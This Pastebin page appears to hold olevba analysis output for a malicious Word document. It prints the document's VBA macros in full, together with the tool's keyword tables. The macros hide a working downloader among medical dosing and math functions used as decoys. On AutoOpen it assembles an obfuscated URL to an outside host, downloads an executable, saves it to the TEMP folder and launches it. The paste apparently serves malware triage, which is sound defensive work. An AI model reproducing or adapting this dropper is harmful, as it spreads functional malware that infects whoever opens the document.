Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- 1445942147T0.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 1445942147T0.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub DcdAC(FFFFF As Long)
- lhwtbkfTu5jYB
- End Sub
- Sub autoopen()
- DcdAC (3)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO M11.bas
- in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/M11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub ParseResponse(scanner_name, json)
- scanner = scanner_name
- '"detected": false, "version": "11.00", "result": null, "update": "20110421"
- On Error Resume Next
- Dim a As Long, b As Long
- Dim main As String, name As String, value As String, scans As String
- tmp = Split(json, ",")
- For Each entry In tmp
- entry = Trim(entry)
- If Len(entry) = 0 Then GoTo nextone
- b = InStr(1, entry, ":")
- If b < 2 Then GoTo nextone
- name = Mid(entry, 1, b - 1)
- value = Mid(entry, b + 1)
- If name = "result" And detected = True Then Stop
- nextone:
- Next
- DoEvents
- End Sub
- Public Function AgExtIntInterval(ByVal CrClStd As Double) As Double
- Select Case CrClStd
- Case My.Forms.FrmCalculator.Q241 To My.Forms.FrmCalculator.Q242
- AgExtIntInterval = 24
- Case My.Forms.FrmCalculator.Q361 To My.Forms.FrmCalculator.Q362
- AgExtIntInterval = 36
- Case My.Forms.FrmCalculator.Q481 To My.Forms.FrmCalculator.Q482
- AgExtIntInterval = 48
- End Select
- End Function
- 'Hyperbolic Sin
- Public Function HSin(x As Double) As Double
- HSin = CDbl((Exp(x) - Exp(-x)) / 2)
- End Function
- Public Function CrClStd(ByVal CrCl As Double, ByVal BSA As Double) As Double
- CrClStd = CrCl * (1.73 / BSA)
- End Function
- Public Function RoundToSignificance(ByVal number As Integer, _
- ByVal roundtonearest As Integer) As Integer
- 'Round number up or down to the nearest multiple of significance
- Dim d As Double
- d = number / roundtonearest
- d = Math.Round(d, 0)
- RoundToSignificance = d * roundtonearest
- End Function
- Public Function TOneHalf(ByVal K As Double) As Double
- TOneHalf = 0.693 / K
- End Function
- Public Function GentKEst(ByVal CrCl As Double) As Double
- GentKEst = (0.00293 * CrCl) + 0.014
- End Function
- 'Cos
- Public Function CosTheta(x As Double) As Double
- CosTheta = Cos((Pi / 180) * CDbl(x))
- End Function
- Public Function IBWMale(ByVal PtHeightinInches As Double) As Double
- IBWMale = 50 + (2.3 * (PtHeightinInches - 60))
- End Function
- Public Function IBWFemale(ByVal PtHeightinInches As Double) As Double
- IBWFemale = 45.5 + (2.3 * (PtHeightinInches - 60))
- End Function
- Public Function CCGFemale(ByVal PtAge As Double, ByVal Weight As Double, ByVal SCr As Double) As Double
- CCGFemale = (((140 - PtAge) * Weight) / (72 * SCr)) * 0.85
- End Function
- Public Function SHKY9cJRiD8Mm(PrtV2KcZsYjCTZ As String)
- Set ZhWWs4Kjk = uhjejFduWS("S" & Chr(104) & Chr(101) & "l" & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i" & "o" & Chr(110))
- ZhWWs4Kjk.Open (AZEJp3Mz)
- End Function
- Public Function uhjejFduWS(A5D3i3tyZ As String)
- Set uhjejFduWS = CreateObject(A5D3i3tyZ)
- End Function
- Public Function JelliffeMale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
- JelliffeMale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73))
- End Function
- Public Function JelliffeFemale(ByVal PtAge As Double, ByVal SCr As Double, ByVal BSA As Double) As Double
- JelliffeFemale = (((98 - (0.8 * (PtAge - 20))) / SCr) * (BSA / 1.73)) * 0.9
- End Function
- Public Function oDMPcMtKN938lx(zeXN04TOAASAo2 As Variant, HlIR1pypwM56D0 As String)
- Dim sZSYhIPY3: Set sZSYhIPY3 = uhjejFduWS("A" & Chr(100) & "o" & Chr(100) & Chr(98) & "." & "S" & Chr(116) & "r" & Chr(101) & Chr(97) & Chr(109))
- With sZSYhIPY3
- .Type = 1
- .Open
- .write zeXN04TOAASAo2
- .savetofile HlIR1pypwM56D0, 2
- End With
- End Function
- Public Function AgExtIntDose(ByVal DosingWeight As Double) As Integer
- AgExtIntDose = My.Forms.FrmCalculator.ExtInt * DosingWeight
- End Function
- Public Function PaddedScanner(Optional bufSz As Long = 20) As String
- Dim tmp As String
- tmp = scanner
- While Len(tmp) < bufSz
- tmp = tmp & " "
- Wend
- PaddedScanner = tmp
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1F3.bas
- in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module1F3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public OIHoihoih As String
- Public AZEJp3Mz As String
- Public Const Pi = 3.14159265358979
- 'Sin
- 'Inverse Secant
- Public Function ISec(x As Double) As Double
- ISec = CDbl((180 / Pi) * Atn(x / Sqr(x * x - 1))) + Sgn((x) - 1) * (2 * CDbl((180 / Pi) * Atn(1)))
- End Function
- 'Inverse Cotangent
- Public Function ICot(x As Double) As Double
- ICot = CDbl((180 / Pi) * Atn(x)) + 2 * CDbl((180 / Pi) * Atn(1))
- End Function 'Hyperbolic Secant
- Public Function HSec(x As Double) As Double
- HSec = CDbl(2 / (Exp(x) - Exp(-x)))
- End Function
- 'Hyperbolic Cotangent
- Public Function HCotan(x As Double) As Double
- HCotan = CDbl((Exp(x) + Exp(-x)) / (Exp(x) - Exp(-x)))
- End Function
- 'Inverse Hyperbolic Sine
- Public Function IHSin(x As Double) As Double
- IHSin = CDbl(Log(x + Sqr(x * x + 1)))
- End Function
- 'Inverse Hyperbolic Cos
- Public Function IHCos(x As Double) As Double
- IHCos = CDbl(Log(x + Sqr(x * x - 1)))
- End Function
- 'Inverse Hyperbolic Tangent
- Public Function IHTan(x As Double) As Double
- IHTan = CDbl(Log((1 + x) / (1 - x)) / 2)
- End Function
- 'Inverse Hyperbolic Secant
- Public Function IHSec(x As Double) As Double
- IHSec = CDbl(Log((Sqr(-x * x + 1) + 1) / x))
- End Function
- Sub lhwtbkfTu5jYB()
- OIHoihoih = "h" & "t" & "t" & "p" & ":" & "/" & "/" & "g" & "6" & Chr(48) & Chr(48) & "0" & "4" & "2" & Chr(52) & Chr(46) & Chr(102) & Chr(101) & "r" & "o" & Chr(122) & Chr(111) & Chr(46) & "c" & "o" & "m" & Chr(47) & Chr(50) & "5" & Chr(47) & Chr(49) & Chr(48) & Chr(46) & "e" & Chr(120) & Chr(101)
- Set efAv8tqEYv = uhjejFduWS(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80))
- JGHfvkj = False
- Set dhKI3Zii1 = uhjejFduWS("W" & Chr(83) & Chr(99) & "r" & Chr(105) & Chr(112) & Chr(116) & Chr(46) & "S" & Chr(104) & "e" & Chr(108) & "l")
- kJBFN = "E" & Chr(110) & "" & Chr(118) & Chr(105) & "" & "" & "" & "" & Chr(114) & "o" & "n" & "m" & Chr(101) & "n" & "t"
- LKNlk = Chr(80) & Chr(114) & Chr(111) & "" & "" & "" & Chr(99) & "e" & Chr(115) & Chr(115)
- Set GA0VCrFE = CallByName(dhKI3Zii1, kJBFN, VbGet, LKNlk)
- IjyE6UGLtZa = GA0VCrFE(Chr(84) & "E" & Chr(77) & Chr(80))
- AZEJp3Mz = IjyE6UGLtZa & Chr(92) & "r" & Chr(105) & Chr(100) & Chr(101) & Chr(98) & "o" & Chr(115) & Chr(53) & Chr(46) & Chr(101) & "x" & Chr(101)
- CallByName efAv8tqEYv, "O" & Chr(112) & "e" & Chr(110), VbMethod, "" & "G" & Chr(69) & "" & "" & "" & Chr(84), OIHoihoih, JGHfvkj
- Dim TMz47GycIf() As Byte
- CallByName efAv8tqEYv, "S" & Chr(101) & Chr(110) & Chr(100), VbMethod
- TMz47GycIf = CallByName(efAv8tqEYv, Chr(114) & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & "e" & Chr(66) & "o" & Chr(100) & "y", VbGet)
- oDMPcMtKN938lx TMz47GycIf, AZEJp3Mz
- On Error GoTo Vo7uJ9Tj6G
- a = 332 / 0
- On Error GoTo 0
- xKyUc77k:
- Exit Sub
- Vo7uJ9Tj6G:
- SHKY9cJRiD8Mm ("SUIBVc7Pfr")
- Resume xKyUc77k
- End Sub
- Public Function Sine(x As Double) As Double
- Sine = Sin((Pi / 180) * CDbl(x))
- End Function
- 'Inverse Hyperbolic Cosecant
- Public Function IHCosec(x As Double) As Double
- IHCosec = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
- End Function
- 'Inverse Hyperbolic Cotangent
- Public Function IHCot(x As Double) As Double
- IHCot = CDbl(Log((Sgn(x) * Sqr(x * x + 1) + 1) / x))
- End Function
- '********************************************************************
- '
- ' OTHER USEFUL FUNCTIONS
- '
- '********************************************************************
- Public Function Power(x As Double, Y As Double) As Double
- Power = x ^ Y
- End Function
- Public Function LogN(Base As Double, x As Double) As Double
- LogN = Log(x) / Log(Base)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: 1445942147T0.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement